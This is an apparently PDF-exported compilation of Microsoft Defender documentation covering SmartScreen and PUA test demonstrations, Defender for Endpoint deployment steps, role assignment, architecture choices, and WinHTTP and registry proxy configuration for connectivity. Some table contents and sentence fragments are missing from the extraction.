1. Go to http://www.amtso.org/feature-settings-check-potentially-unwanted-
applications/
2. Click "Download the Potentially Unwanted Application 'test' file" link
3. After downloading the file, it's automatically blocked and prevented from running.
See also
Detect and block Potentially Unwanted Applications
 Tip
Feedback

URL reputation demonstrations
Article • 01/16/2024
Applies to:

Test how Microsoft Defender SmartScreen helps you identify phishing and malware
websites based on URL reputation. Scenario requirements and setup
Windows 11 or Windows
Server 2012 R2 and Windows Server 2008 R2 SP1.
Microsoft Edge browser required
For more information, see Microsoft Defender SmartScreen
SmartScreen for Microsoft Edge URL scenario

demonstrations
Is This Phishing?
Alerts the user to a suspicious page and ask for feedback:
Is this Phishing?
Launching this link should render a message similar to the following screenshot:
Phishing Page
A page known for phishing that should be blocked:
A known Phishing page
Launching this link should render a message similar to the following example:
Malware page
A page that hosts malware and should be blocked:
A known malware page
Blocked download
Blocked from downloading because of its URL reputation
Download blocked due to URL reputation
Launching this link should render a message similar to the Malware page message.
Exploit page
A page that attacks a browser vulnerability
Known browser exploit page
Launching this link should render a message similar to the Malware page message.
Malvertising
A benign page hosting a malicious advertisement
A page known to contain malicious advertisements
See also
Microsoft Defender SmartScreen Documentation
 Tip
Feedback

Get started with your Microsoft
Defender for Endpoint deployment
Article • 02/22/2024
Applies to:

 Tip
As a companion to this article, we recommend using the Microsoft Defender for

Endpoint automated setup guide when signed in to the Microsoft 365 admin
center. This guide will customize your experience based on your environment. To
review best practices without signing in and activating automated setup features,
go to the Microsoft 365 setup guide .
Maximize available security capabilities and better protect your enterprise from cyber
threats by deploying Microsoft Defender for Endpoint and onboarding your devices.
Onboarding your devices enables you to identify and stop threats quickly, prioritize
risks, and evolve your defenses across operating systems and network devices.
This guide provides five steps to help deploy Defender for Endpoint as your multi-
platform endpoint protection solution. It helps you choose the best deployment tool,
onboard devices, and configure capabilities. Each step corresponds to a separate article.
The steps to deploy Defender for Endpoint are:
1. Step 1 - Set up Microsoft Defender for Endpoint deployment: This step focuses on
getting your environment ready for deployment.
2. Step 2 - Assign roles and permissions: Identify and assign roles and permissions to
view and manage Defender for Endpoint.
3. Step 3 - Identify your architecture and choose your deployment method: Identify
your architecture and the deployment method that best suits your organization.
4. Step 4 - Onboard devices: Assess and onboard your devices to Defender for
Endpoint.
5. Step 5 - Configure capabilities: You're now ready to configure Defender for
Endpoint security capabilities to protect your devices.
Requirements
Here's a list of prerequisites required to deploy Defender for Endpoint:
You're a global admin

Your environment meets the minimum requirements
You have a full inventory of your environment. The following table provides a
starting point to gather information and ensure your environment is deeply
understood by stakeholders, which helps identify potential dependencies and/or
changes required in technologies or processes.
ﾉ Expand table
What Description
Endpoint count Total count of endpoints by operating system.
Server count Total count of Servers by operating system version.
Management engine Management engine name and version (for example, System Center
Configuration Manager Current Branch 1803).
CDOC distribution High level CDOC structure (for example, Tier 1 outsourced to Contoso,
Tier 2 and Tier 3 in-house distributed across Europe and Asia).
Security information and SIEM technology in use.

event (SIEM)
Next step
Start your deployment with Step 1 - Set up Microsoft Defender for Endpoint deployment
 Tip
Feedback

Set up Microsoft Defender for Endpoint
deployment
Article • 11/29/2023
Applies to:

The first step when deploying Microsoft Defender for Endpoint is to set up your
Defender for Endpoint environment.
In this deployment scenario, you'll be guided through the steps on:
Licensing validation
Tenant configuration
Network configuration
７ Note
For the purpose of guiding you through a typical deployment, this scenario will
only cover the use of Microsoft Configuration Manager. Defender for Endpoint
supports the use of other onboarding tools but we won't cover those scenarios in
the deployment guide. For more information, see Identify Defender for Endpoint
architecture and deployment method.
Check license state

Checking for the license state and whether it was properly provisioned can be done
through the admin center or through the Microsoft Azure portal.
1. To view your licenses, go to the Microsoft Azure portal and navigate to the
Microsoft Azure portal license section .

2. Alternately, in the admin center, navigate to Billing > Subscriptions.
On the screen, you'll see all the provisioned licenses and their current Status.
Cloud Service Provider validation

To gain access into which licenses are provisioned to your company, and to check the
state of the licenses, go to the admin center.
1. From the Partner portal, select Administer services > Office 365.
2. Clicking on the Partner portal link will open the Admin on behalf option and will
give you access to the customer admin center.

Tenant Configuration
Onboarding to Microsoft Defender for Endpoint is easy. From the navigation menu,
select any item under the Endpoints section, or any Microsoft Defender XDR feature
such as Incidents, Hunting, Action center, or Threat analytics to initiate the onboarding
process.
From a web browser, navigate to the Microsoft Defender portal .
Data center location

Microsoft Defender for Endpoint will store and process data in the same location as
used by Microsoft Defender XDR. If Microsoft Defender XDR has not been turned on yet,
onboarding to Microsoft Defender for Endpoint will also turn on Microsoft Defender
XDR and a new data center location is automatically selected based on the location of
active Microsoft 365 security services. The selected data center location is shown on the
screen.
Network configuration
If the organization doesn't require the endpoints to use a Proxy to access the Internet,
skip this section.
The Microsoft Defender for Endpoint sensor requires Microsoft Windows HTTP
(WinHTTP) to report sensor data and communicate with the Microsoft Defender for
Endpoint service. The embedded Microsoft Defender for Endpoint sensor runs in the
system context using the LocalSystem account. The sensor uses Microsoft Windows
HTTP Services (WinHTTP) to enable communication with the Microsoft Defender for
Endpoint cloud service. The WinHTTP configuration setting is independent of the
Windows Internet (WinINet) internet browsing proxy settings and can only discover a
proxy server by using the following discovery methods:
Autodiscovery methods:
Transparent proxy
Web Proxy Autodiscovery Protocol (WPAD)
If a Transparent proxy or WPAD has been implemented in the network topology,

there is no need for special configuration settings. For more information on
Microsoft Defender for Endpoint URL exclusions in the proxy, see the Proxy Service
URLs section in this document for the URLs allow list or on Configure device proxy
Manual static proxy configuration:
Registry-based configuration
WinHTTP configured using netsh command
Suitable only for desktops in a stable topology (for example: a desktop in a

corporate network behind the same proxy).
Configure the proxy server manually using a registry-

based static proxy
Configure a registry-based static proxy to allow only Microsoft Defender for Endpoint
sensor to report diagnostic data and communicate with Microsoft Defender for
Endpoint services if a computer isn't permitted to connect to the Internet. The static
proxy is configurable through Group Policy (GP). The group policy can be found under:
Administrative Templates > Windows Components > Data Collection and Preview
Builds > Configure Authenticated Proxy usage for the Connected User Experience
and Telemetry Service
Set it to Enabled and select Disable Authenticated Proxy usage
1. Open the Group Policy Management Console.
2. Create a policy or edit an existing policy based off the organizational practices.
3. Edit the Group Policy and navigate to Administrative Templates > Windows
Components > Data Collection and Preview Builds > Configure Authenticated
Proxy usage for the Connected User Experience and Telemetry Service.
4. Select Enabled.
5. Select Disable Authenticated Proxy usage.
6. Navigate to Administrative Templates > Windows Components > Data Collection

and Preview Builds > Configure connected user experiences and telemetry.

7. Select Enabled.
8. Enter the Proxy Server Name.
The policy sets two registry values TelemetryProxyServer as REG_SZ and

DisableEnterpriseAuthProxy as REG_DWORD under the registry key
HKLM\Software\Policies\Microsoft\Windows\DataCollection .
The registry value TelemetryProxyServer takes the following string format:
<server name or ip>:<port>
For example: 10.0.0.6:8080
The registry value DisableEnterpriseAuthProxy should be set to 1.
Configure the proxy server manually using netsh

command
Use netsh to configure a system-wide static proxy.
７ Note
This will affect all applications including Windows services which use WinHTTP
with default proxy.
Laptops that are changing topology (for example: from office to home) will
malfunction with netsh. Use the registry-based static proxy configuration.
1. Open an elevated command line:

a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.
2. Enter the following command and press Enter:
Windows Command Prompt
netsh winhttp set proxy <proxy>:<port>
For example: netsh winhttp set proxy 10.0.0.6:8080
Proxy Configuration for down-level devices

Down-Level devices include Windows 7 SP1 and Windows 8.1 workstations as well as
Windows Server 2008 R2, and other server operating systems that have been onboarded
previously using the Microsoft Monitoring Agent. These operating systems will have the
proxy configured as part of the Microsoft Management Agent to handle communication
from the endpoint to Azure. Refer to the Microsoft Management Agent Fast
Deployment Guide for information on how a proxy is configured on these devices.
Proxy Service URLs

URLs that include v20 in them are only needed if you have Windows 10, version 1803 or
Windows 11 devices. For example, us-v20.events.data.microsoft.com is only needed if
the device is on Windows 10, version 1803 or Windows 11.
If a proxy or firewall is blocking anonymous traffic, as Microsoft Defender for Endpoint

sensor is connecting from system context, make sure anonymous traffic is permitted in
the listed URLs.
that your network must be able to connect to. Ensure there are no firewall or network
filtering rules that would deny access to these URLs, or you may need to create an allow
rule specifically for them.
ﾉ Expand table
customers.
Next step
Continue to Step 2 - Assign roles and permissions
 Tip
Feedback

Assign roles and permissions for
deployment
Article • 10/20/2023
Applies to:

The next step when deploying Defender for Endpoint is to assign roles and permissions
for The Defender for Endpoint deployment.
Role-based access control

Microsoft recommends using the concept of least privileges. Defender for Endpoint
leverages built-in roles within Microsoft Entra ID. Microsoft recommends review the
different roles that are available and choose the right one to solve your needs for each
persona for this application. Some roles may need to be applied temporarily and
removed after the deployment has been completed.
ﾉ Expand table
Personas Roles Microsoft Entra role (if necessary) Assign to
Security Administrator
Security Analyst
Endpoint Administrator
Infrastructure Administrator
Business Owner/Stakeholder
Microsoft recommends using Privileged Identity Management to manage your roles to
provide additional auditing, control, and access review for users with directory
permissions.

Users with Global Administrator or Security Administrator roles in Microsoft Entra
ID have full access. The Security reader role has read-only access and does not
grant access to view machines/device inventory.

access to device groups. For more information. see Manage portal access using
Microsoft recommends leveraging RBAC to ensure that only users that have a business
justification can access Defender for Endpoint.
You can find details on permission guidelines here: Create roles and assign the role to a
Microsoft Entra group.
The following example table serves to identify the Cyber Defense Operations Center
structure in your environment that will help you determine the RBAC structure required
for your environment.
ﾉ Expand table
Tier Description Permission Required
Tier Local security operations team / IT team

1
This team usually triages and investigates alerts contained
within their geolocation and escalates to Tier 2 in cases where
an active remediation is required.
Tier Regional security operations team View data

2
This team can see all the devices for their region and perform
remediation actions.
Tier Global security operations team View data

3 Alerts investigation
This team consists of security experts and is authorized to see Active remediation
and perform all actions from the portal. actions
Alerts investigation
Active remediation
Tier Description Permission Required
actions
Manage portal system

settings
Manage security settings
Next step
After assigning roles and permissions to view and manage Defender for Endpoint it's
time for Step 3 - Identify your architecture and choose your deployment method.
 Tip
Feedback

Identify Defender for Endpoint
architecture and deployment method
Article • 11/15/2023
Applies to:

You've already completed steps to set up your Microsoft Defender for Endpoint
deployment and assigned roles and permissions for Defender for Endpoint. Next, plan
for onboarding your devices by identifying your architecture and choosing your
deployment method.
We understand that every enterprise environment is unique, so we've provided several

options to give you the flexibility in choosing how to deploy the service. Deciding how
to onboard endpoints to the Defender for Endpoint service comes down to two
important steps:
Step 1: Identify your architecture

Depending on your environment, some tools are better suited for certain architectures.
Use the table below to decide which Defender for Endpoint architecture best suits your
organization.
ﾉ Expand table
Architecture Description
Cloud-native We recommend using Microsoft Intune to onboard, configure, and remediate

endpoints from the cloud for enterprises that don't have an on-premises
configuration management solution or are looking to reduce their on-
premises infrastructure.
Co- For organizations that host both on-premises and cloud-based workloads we
management recommend using Microsoft's ConfigMgr and Intune for their management
needs. These tools provide a comprehensive suite of cloud-powered
management features, as well as unique co-management options to provision,
deploy, manage, and secure endpoints and applications across an
organization.
On-premises For enterprises that want to take advantage of the cloud-based capabilities of
Microsoft Defender for Endpoint while also maximizing their investments in
Configuration Manager or Active Directory Domain Services, we recommend
this architecture.
Evaluation and We recommend this architecture for SOCs (Security Operations Centers) that
local are looking to evaluate or run a Microsoft Defender for Endpoint pilot, but
onboarding don't have existing management or deployment tools. This architecture can
also be used to onboard devices in small environments without management
infrastructure, such as a DMZ (Demilitarized Zone).
Step 2: Select deployment method

Once you have determined the architecture of your environment and have created an
inventory as outlined in the requirements section, use the table below to select the
appropriate deployment tools for the endpoints in your environment. This will help you
plan the deployment effectively.
ﾉ Expand table
Windows Local script (up to 10 devices)

Group Policy
Microsoft Intune/ Mobile Device Manager
Microsoft Configuration Manager
VDI scripts
Windows servers Integration with Microsoft Defender for Cloud

Linux servers
macOS Local script

Microsoft Intune
JAMF Pro
Linux servers Local script

Puppet
Ansible
Chef
Saltstack

７ Note
For devices that aren't managed by Microsoft Intune or Microsoft Configuration

Manager, you can use the Security Management for Microsoft Defender for
Endpoint to receive security configurations for Microsoft Defender directly from
Intune.
Next step
After choosing your Defender for Endpoint architecture and deployment method
continue to Step 4 - Onboard devices.
 Tip
Feedback
Onboard to Microsoft Defender for
Endpoint
Article • 07/10/2023
Applies to:

Onboard devices using any of the supported

management tools
The deployment tool you use influences how you onboard endpoints to the service.
To start onboarding your devices:
1. Go to Select deployment method.

2. Choose the Operating System for the devices you wish to Onboard.
3. Select the tool you plan to use.
4. Follow the instructions to Onboard your devices.
This video provides a quick overview of the onboarding process and the different tools
and methods.
https://www.microsoft.com/en-us/videoplayer/embed/RE4bGqr?postJsllMsg=true
Deploy using a ring-based approach
New deployments
A ring-based approach is a method of identifying a set of endpoints to onboard and
verifying that certain criteria are met before proceeding to deploy the service to a larger
set of devices. You can define the exit criteria for each ring and ensure that they're
satisfied before moving on to the next ring. Adopting a ring-based deployment helps
reduce potential issues that could arise while rolling out the service.
This table provides an example of the deployment rings you might use:
ﾉ Expand table
Deployment Description
ring
Evaluate Ring 1: Identify 50 devices to onboard to the service for testing.
Pilot Ring 2: Identify and onboard the next 50-100 endpoints in a production
environment. Microsoft Defender for Endpoint supports various endpoints that
you can onboard to the service, for more information, see Select deployment
method.
Full Ring 3: Roll out service to the rest of environment in larger increments. For more
deployment information, see Get started with your Microsoft Defender for Endpoint
deployment.
Exit criteria
An example set of exit criteria for each ring can include:
Devices show up in the device inventory list

Alerts appear in dashboard
Run a detection test
Run a simulated attack on a device
Existing deployments
Windows endpoints
For Windows and/or Windows Servers, you select several machines to test ahead of time
(before patch Tuesday) by using the Security Update Validation program (SUVP).
For more information, see:
What is the Security Update Validation Program

Software Update Validation Program and Microsoft Malware Protection Center
Establishment - TwC Interactive Timeline Part 4
Non-Windows endpoints
With macOS and Linux, you could take a couple of systems and run in the Beta channel.
７ Note
Ideally at least one security admin and one developer so that you are able to find
compatibility, performance and reliability issues before the build makes it into the
Current channel.
The choice of the channel determines the type and frequency of updates that are
offered to your device. Devices in Beta are the first ones to receive updates and new
features, followed later by Preview and lastly by Current.
In order to preview new features and provide early feedback, it's recommended that you
configure some devices in your enterprise to use either Beta or Preview.
２ Warning
Switching the channel after the initial installation requires the product to be
reinstalled. To switch the product channel: uninstall the existing package, re-
configure your device to use the new channel, and follow the steps in this
document to install the package from the new location.
Example deployments
To provide some guidance on your deployments, in this section we'll guide you through
using two deployment tools to onboard endpoints.
The tools in the example deployments are:
Onboarding using Microsoft Configuration Manager

Onboarding using Microsoft Intune
For some additional information and guidance, check out the PDF or Visio to see
the various paths for deploying Defender for Endpoint.
The example deployments will guide you on configuring some of the Defender for
Endpoint capabilities, but you'll find more detailed information on configuring Defender
for Endpoint capabilities in the next step.
Next step
After onboarding the endpoints move on to the next step where you'll configure the
various capabilities such as endpoint detection and response, next-generation
protection, and attack surface reduction.
Step 5 - Configure capabilities
 Tip
Feedback

Configure Microsoft Defender for
Endpoint capabilities
Article • 07/10/2023
Applies to:

） Important
Some information in this article relates to prereleased product which may be

substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.
In this step, you're ready to configure Microsoft Defender for Endpoint capabilities.
Configure capabilities
In many cases, organizations will have existing endpoint security products in place. The
bare minimum being an antivirus solution, but in some cases, an organization might
have existing endpoint detection and response solution.
It is common that Defender for Endpoint will need to exist along side these existing
endpoint security products either indefinitely or during a cutover period. Fortunately,
Defender for Endpoint and the endpoint security suite is modular and can be adopted in
a systematic approach.
Onboarding devices effectively enables the endpoint detection and response capability
of Microsoft Defender for Endpoint. After onboarding the devices, you'll then need to
configure the other capabilities of the service. The following table lists the capabilities
you can configure to get the best protection for your environment and the order
Microsoft recommends for how the endpoint security suite should be enabled.
ﾉ Expand table
Capability Description Adoption
Order
Rank
Endpoint Defender for Endpoint endpoint detection and response 1

Detection & capabilities provide advanced attack detections that are near
Response (EDR) real-time and actionable. Security analysts can prioritize alerts
effectively, gain visibility into the full scope of a breach, and
take response actions to remediate threats.
Configure Defender Vulnerability Management is a component of 2

Microsoft Microsoft Defender for Endpoint, and provides both security
Defender administrators and security operations teams with unique
Vulnerability value, including:
Management
- Real-time endpoint detection and response (EDR) insights
correlated with endpoint vulnerabilities.
- Invaluable device vulnerability context during incident

investigations.
- Built-in remediation processes through Microsoft Intune and

Microsoft System Center Configuration Manager.
Configure Next- Microsoft Defender Antivirus is a built-in antimalware solution 3

generation that provides next-generation protection for desktops,
protection (NGP) portable computers, and servers. Microsoft Defender Antivirus
includes:
-Cloud-delivered protection for near-instant detection and

blocking of new and emerging threats. Along with machine
learning and the Intelligent Security Graph, cloud-delivered
protection is part of the next-gen technologies that power
Microsoft Defender Antivirus.
- Always-on scanning using advanced file and process behavior

monitoring and other heuristics (also known as "real-time
protection").
- Dedicated protection updates based on machine learning,

human and automated big-data analysis, and in-depth threat
resistance research.
Configure attack Attack surface reduction capabilities in Microsoft Defender for 4

surface reduction Endpoint help protect the devices and applications in the
organization from new and emerging threats.
Configure Auto Microsoft Defender for Endpoint uses Automated Not

Investigation & investigations to significantly reduce the volume of alerts that applicable
need to be investigated individually. The Automated
Capability Description Adoption
Order
Rank
Remediation (AIR) investigation feature leverages various inspection algorithms,

capabilities and processes used by analysts (such as playbooks) to examine
alerts and take immediate remediation action to resolve
breaches. This significantly reduces alert volume, allowing
security operations experts to focus on more sophisticated
threats and other high value initiatives.
Configure Microsoft Experts is a managed hunting service that provides Not

Microsoft Security Operation Centers (SOCs) with expert level monitoring applicable
Defender Experts and analysis to help them ensure that critical threats in their
capabilities unique environments don't get missed.
For more information, see Supported Microsoft Defender for Endpoint capabilities by
platform.
 Tip
Feedback

STEP 1: Configure your network
environment to ensure connectivity with
Defender for Endpoint service
Article • 02/01/2024
Applies to:

） Important

Before you onboard devices to Defender for Endpoint, make sure your network is
configured to connect to the service. The first step of this process involves adding URLs
to the allowed domains list if your proxy server or firewall rules prevent access to
Defender for Endpoint. This article also includes information about proxy and firewall
requirements for older versions of Windows client and Windows Server.
Enable access to Microsoft Defender for

Endpoint service URLs in the proxy server
By default, if a proxy or firewall is blocking all traffic and allowing only specific domains,
then add the domains listed in the downloadable sheet to the allowed domains list.
that your network must be able to connect. Ensure there are no firewall or network
filtering rules to deny access for these URLs. Optionally, you may need to create an allow
rule specifically for them.
７ Note
(Applies to public preview)
As part of the preview, certain Defender for Endpoint services are

consolidated behind the URL: *.endpoint.security.microsoft.com . You have
the option to use the reduced set of URLs in Microsoft Defender XDR for
Defender for Endpoint. You also have the new option of configuring allow lists
using static Defender for Endpoint dedicated IP ranges. For more information,
see onboarding devices using streamlined method and review the updated
list in the preceding table.
To use the new onboarding method, devices must meet specific prerequisites
and use a new onboarding package. For more information, see prerequisites.
You can migrate previously onboarded devices. See, migrating devices to
streamlined connectivity.
Certain services are not included in this consolidation. You must verify that
you maintain connectivity with the required services. For details on services
not included in the consolidation, see the streamlined URL sheet or
onboarding devices using streamlined method.
Devices running the MMA agent are not supported under streamlined
solution and must be onboarded using the down-level method. For a list of
required URLs, see the MMA tab in the streamlined URL list . Devices
running legacy Windows version 1607, 1703, 1709, or 1803 can onboard using
the new onboarding package but still require a longer list of URLs. For more
information, see the preceeding table.
ﾉ Expand table
Microsoft Defender for Endpoint IMPORTANT: Currently in public preview.

consolidated URL list (NEW - Spreadsheet of consolidated URLs for streamlining device
Streamlined) connectivity.
Applicable OS:
For complete list, see streamlined connectivity.
- Windows 10 1809+
- Windows 11
- Windows Server 2019
- Windows Server 2022
- Windows Server 2012 R2, Windows Server 2016 R2

running Defender for Endpoint modern unified solution
(requires installation through MSI).
- macOS supported versions running 101.23102.* +
- Linux supported versions running 101.23102.* +
Minimum component versions:

- Antimalware client: 4.18.2211.5
- Engine: 1.1.19900.2
- Security intelligence: 1.391.345.0
- Xplat version: 101.23102.* +
- Sensor/ KB version: >10.8040.*/ March 8, 2022+
If you are moving previously onboarded devices to the

streamlined approach, see Migrating device connectivity.
(Standard) Download the spreadsheet here.
Microsoft Defender for Endpoint Plan 1 and Plan 2 share

the same proxy service URLs.
customers.
７ Note
1. Windows 10 version 1607, 1703, 1709, 1803 (RS1-RS4) are supported on the
onboarding package but require a longer URL list (see updated URL sheet).
These versions do not support reonboarding (must be fully offboarded first).
2. Devices running on Windows 7, Windows 8.1, Windows Server 2008 R2 MMA,
Servers not upgraded to Unified Agent (MMA) will need to continue using
MMA onboarding method.
If a proxy or firewall has HTTPS scanning (SSL inspection) enabled, exclude the domains
listed in the above table from HTTPS scanning. In your firewall, open all the URLs where
the geography column is WW. For rows where the geography column isn't WW, open
the URLs to your specific data location. To verify your data location setting, see Verify
data storage location and update data retention settings for Microsoft Defender for
Endpoint. Don't exclude the URL *.blob.core.windows.net from any kind of network
inspection. Instead, exclude only the blob URLs that are specific to MDE and listed in the
spreadsheet of domains list.
７ Note
Applies to standard set of URLS:

Windows devices running with version 1803 or earlier needs settings-
win.data.microsoft.com .
URLs that include v20 in them are only needed if you have Windows devices
running version 1803 or later. For example, us-v20.events.data.microsoft.com is
needed for a Windows device running version 1803 or later and onboarded to US
Data Storage region.
If a proxy or firewall is blocking anonymous traffic from the Defender for Endpoint
sensor and it's connecting from system context, it's important to make sure anonymous
traffic is permitted in your proxy or firewall for the previously listed URLs.
７ Note
Microsoft does not provide a proxy server. These URLs are accessible via the proxy
server that you configure.
） Important
In compliance with Defender for Endpoint security and compliance standards, your
data will be processed and stored in accordance with your tenant's physical
location. Based on client location, traffic may flow through any of these IP regions
(which correspond to Azure datacenter regions). For more information, see Data
storage and privacy.
Microsoft Monitoring Agent (MMA) - proxy

and firewall requirements for older versions of
Windows client or Windows Server
７ Note
Services using MMA-based solutions are not able to leverage the new streamlined
connectivity solution (consolidated URL and option to use static IPs). For Windows
Server 2016 and Windows Server 2012 R2, you will need to update to the new
unified solution.
The information in the list of proxy and firewall configuration information is required to
communicate with Log Analytics agent (often referred to as Microsoft Monitoring
Agent) for previous versions of Windows, such as Windows 7 SP1, Windows 8.1, and
Windows Server 2008 R2*.
ﾉ Expand table
Agent Resource Ports Direction Bypass HTTPS inspection
*.ods.opinsights.azure.com Port 443 Outbound Yes
*.oms.opinsights.azure.com Port 443 Outbound Yes
*.blob.core.windows.net Port 443 Outbound Yes
*.azure-automation.net Port 443 Outbound Yes
７ Note
These connectivity requirements apply to the previous Microsoft Defender for

Endpoint of Windows Server 2016, and Windows Server 2012 R2 that requires
MMA. Instructions to onboard these operating systems with the new unified
solution are at Onboard Windows servers, or migrate to the new unified solution
at Server migration scenarios in Microsoft Defender for Endpoint.
７ Note
As a cloud-based solution, the IP range can change. It's recommended, you move
to DNS resolving setting.
Onboard devices without Internet access

For devices with no direct internet connection, the use of a proxy solution is the
recommended approach. For older Windows devices onboarded using the previous,
MMA-based solution the use of the OMS gateway solution provides an alternative
approach.
７ Note

With this preview, you can leverage firewall devices with static IP ranges. For more
information, see: Streamlined device connectivity and streamlined URL list .
For more information about onboarding methods, see the following articles:
Onboard previous versions of Windows

Onboard servers to the Microsoft Defender for Endpoint service
） Important
Microsoft Defender for Endpoint is a Cloud security solution. "Onboard

devices without Internet access" means that Internet access for the endpoints
must be configured through a proxy. Microsoft Defender for Endpoint does
not support endpoints without direct or proxy Internet access. System wide
proxy configuration recommended.
Windows or Windows Server in disconnected environments must be able to
update Certificate Trust Lists offline via an internal file or web server.
For more information about updating CTLs offline, see Configure a file or
web server to download the CTL files.
Devices running Windows 10 or later, Windows Server

2012 R2 or later, Linux and macOS
Depending on the operating system, the proxy to be used for Microsoft Defender for
Endpoint can be configured automatically, typically by using autodiscovery or an
autoconfig file, or statically specific to Defender for Endpoint services running on the
device.
For Windows devices, see Configure device proxy and Internet connectivity
settings
For Linux devices, see Configure Microsoft Defender for Endpoint on Linux for
static proxy discovery
For macOS devices, see Microsoft Defender for Endpoint on Mac
Windows devices running the previous MMA-based
solution
７ Note
An OMS gateway server cannot be used as proxy for disconnected Windows

or Windows Server devices when configured via 'TelemetryProxyServer'
registry or GPO.
For Windows or Windows Server - while you may use TelemetryProxyServer, it
must point to a standard proxy device or appliance.
Set up Azure Log Analytics (formerly known as OMS Gateway) to act as proxy or
hub:
Azure Log Analytics Agent
Install and configure Microsoft Monitoring Agent (MMA) point to Defender for
Endpoint Workspace key & ID
７ Note
Any client that has no access to the internet cannot be onboarded to Microsoft
Defender Endpoint. A client must either have access to the required URLs directly,
or it must have access via a proxy or firewall.
As part of the streamlined preview, you can now leverage IP addresses as
alternatives to certain Defender for Endpoint service URLs.
Confirm Microsoft Monitoring Agent (MMA)

Service URL Requirements
See the following guidance to eliminate the wildcard (*) requirement for your specific
environment when using the Microsoft Monitoring Agent (MMA) for previous versions
of Windows.
1. Onboard a previous operating system with the Microsoft Monitoring Agent (MMA)
into Defender for Endpoint (for more information, see Onboard previous versions
of Windows on Defender for Endpoint and Onboard Windows servers).
2. Ensure the machine is successfully reporting into the Microsoft Defender portal.
3. Run the TestCloudConnection.exe tool from C:\Program Files\Microsoft
Monitoring Agent\Agent to validate the connectivity, and to get the required URLs
for your specific workspace.
4. Check the Microsoft Defender for Endpoint URLs list for the complete list of
requirements for your region (refer to the Service URLs Spreadsheet ).
The wildcards (*) used in *.ods.opinsights.azure.com , *.oms.opinsights.azure.com , and

*.agentsvc.azure-automation.net URL endpoints can be replaced with your specific
Workspace ID. The Workspace ID is specific to your environment and workspace. It can
be found in the Onboarding section of your tenant within the Microsoft Defender portal.
The *.blob.core.windows.net URL endpoint can be replaced with the URLs shown in the
"Firewall Rule: *.blob.core.windows.net" section of the test results.
７ Note
In the case of onboarding via Microsoft Defender for Cloud, multiple workspaces
can be used. You will need to perform the TestCloudConnection.exe procedure on
the onboarded machine from each workspace (to determine, if there are any
changes to the *.blob.core.windows.net URLs between the workspaces).
Next step
STEP 2: Configure your devices to connect to the Defender for Endpoint service using a
proxy
Feedback

STEP 2: Configure your devices to connect to
the Defender for Endpoint service using a proxy
Article • 10/25/2023
Applies to:

） Important
Devices that are configured for IPv6-only traffic are not supported.
The Defender for Endpoint sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data
and communicate with the Defender for Endpoint service. The embedded Defender for Endpoint sensor
runs in system context using the LocalSystem account.
 Tip
For organizations that use forward proxies as a gateway to the Internet, you can use network
protection to investigate connection events that occur behind forward proxies.
The WinHTTP configuration setting is independent of the Windows Internet (WinINet) browsing proxy
settings (see, WinINet vs. WinHTTP). It can only discover a proxy server by using the following discovery
methods:
Autodiscovery methods:
Transparent proxy
Web Proxy Auto-discovery Protocol (WPAD)
７ Note
If you're using Transparent proxy or WPAD in your network topology, you don't need special
configuration settings.
Manual static proxy configuration:
Registry-based configuration
WinHTTP configured using netsh command: Suitable only for desktops in a stable topology (for
example: a desktop in a corporate network behind the same proxy)
７ Note
Defender antivirus and EDR proxies can be set independently. In the sections that follow, be aware
of those distinctions.
Configure the proxy server manually using a registry-

based static proxy
Configure a registry-based static proxy for Defender for Endpoint detection and response (EDR) sensor to
report diagnostic data and communicate with Defender for Endpoint services if a computer isn't
permitted to connect to the Internet.
７ Note
When using this option on Windows 10, or Windows 11, or Windows Server 2019, or Windows
Server 2022, it is recommended to have the following (or later) build and cumulative update rollup:
Windows 11
Windows 10, version 1809 or Windows Server 2019, or Windows Server 2022 -
https://support.microsoft.com/kb/5001384
Windows 10, version 1909 - https://support.microsoft.com/kb/4601380
Windows 10, version 2004 - https://support.microsoft.com/kb/4601382
Windows 10, version 20H2 - https://support.microsoft.com/kb/4601382
These updates improve the connectivity and reliability of the CnC (Command and Control) channel.
The static proxy is configurable through group policy (GP), both the settings under group policy values
should be configured to the proxy server for using EDR. The group policy is available in Administrative
Templates.
Administrative Templates > Windows Components > Data Collection and Preview Builds >
Configure Authenticated Proxy usage for the Connected User Experience and Telemetry Service.
Set it to Enabled and select Disable Authenticated Proxy usage.


Administrative Templates > Windows Components > Data Collection and Preview Builds >
Configure connected user experiences and telemetry:
Configure the proxy.


ﾉ Expand table
Group Policy Registry key Registry entry Value
Configure HKLM\Software\Policies\Microsoft\Windows\DataCollection DisableEnterpriseAuthProxy 1

authenticated (REG_DWORD)
proxy usage
for the
connected
user
experience
and the
telemetry
service
Configure HKLM\Software\Policies\Microsoft\Windows\DataCollection TelemetryProxyServer servername:port

connected or ip:port
user
experiences For example:
and 10.0.0.6:8080
telemetry (REG_SZ)
７ Note
If you are using 'TelemetryProxyServer' setting on devices that are otherwise completely offline,
meaning the operating system is unable to connect for the online certificate revocation list or
Windows Update, then it is required to add the additional registry setting
PreferStaticProxyForHttpRequest with a value of 1 .
Parent registry path location for "PreferStaticProxyForHttpRequest" is

"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"
The following command can be used to insert the registry value in the correct location:
Console
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /v

PreferStaticProxyForHttpRequest /t REG_DWORD /d 1 /f
The above registry value is applicable only starting with MsSense.exe version 10.8210.* and later, or
version 10.8049.* and later.
Configure a static proxy for Microsoft Defender

Antivirus
Microsoft Defender Antivirus cloud-delivered protection provides near-instant, automated protection
against new and emerging threats. Note, the connectivity is required for custom indicators when
Defender Antivirus is your active anti-malware solution. For EDR in block mode has primary anti-malware
solution when using a non-Microsoft solution.
Configure the static proxy using the Group Policy available in Administrative Templates:
1. Administrative Templates > Windows Components > Microsoft Defender Antivirus > Define
proxy server for connecting to the network.
2. Set it to Enabled and define the proxy server. Note, the URL must have either http:// or https://. For
supported versions for https://, see Manage Microsoft Defender Antivirus updates.

3. Under the registry key HKLM\Software\Policies\Microsoft\Windows Defender , the policy sets the
registry value ProxyServer as REG_SZ.
The registry value ProxyServer takes the following string format:
<server name or ip>:<port>
For example: http://10.0.0.6:8080
７ Note
If you are using static proxy setting on devices that are otherwise completely offline, meaning the
operating system is unable to connect for the online certificate revocation list or Windows Update,
then it is required to add the additional registry setting SSLOptions with a dword value of 0. Parent
registry path location for "SSLOptions" is
